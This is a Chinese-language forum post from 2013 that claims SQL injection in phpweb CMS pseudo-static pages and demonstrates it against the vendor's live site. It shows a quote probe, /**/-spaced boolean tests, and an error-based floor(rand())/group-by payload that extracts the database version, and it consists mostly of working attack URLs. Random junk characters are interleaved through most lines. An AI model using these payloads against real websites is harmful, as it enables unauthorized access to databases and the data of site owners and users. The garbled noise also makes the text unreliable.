phpweb所有的整站程序伪静态页面都存在sql注入! x B5 t& j( k7 ~! ?# H5 l5 b
. \: u7 g5 ?' B( e2 n主站:http://phpweb.net/" _0 I$ H0 d9 o6 ~' l8 b
加’检测:' G0 Q& [+ W7 i: D$ \
; w, |$ L9 e4 D/ N/ `6 B4 k2 |
http://www.phpweb.net/down/html/?772′.html
L! B( d0 z& r- h4 R
6 B9 H- b F% ^/ D5 B1 Q出错
8 W3 Z6 } @1 y存在注入。
A4 `8 P4 d. o6 L. V$ Y不能用空格,只能用/*罗! s: p9 T8 e1 \8 W
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
" o# m. u* n6 M) Z; K4 S+ g , \$ Y9 t% G0 ?2 Z/ y& Z' s t
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.0 ?* _" n: T1 @. P$ V- `
爆数据库版本:6 b4 G) ] D$ s+ s; W8 r
u, p/ i3 `$ q% c9 s1 Y?
' ~2 z3 j+ ?/ Q2 e1" B8 G; L6 f4 R: F4 b, U6 w3 v
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
7 z6 S2 [9 ?& n3 b& c5 ~% Z% a更新日期: 2013-01-03 13:39:50
- G' d% p! i4 t: H0 j( Q% B |
发表于 2013-1-4 19:46:42
收藏
支持
反对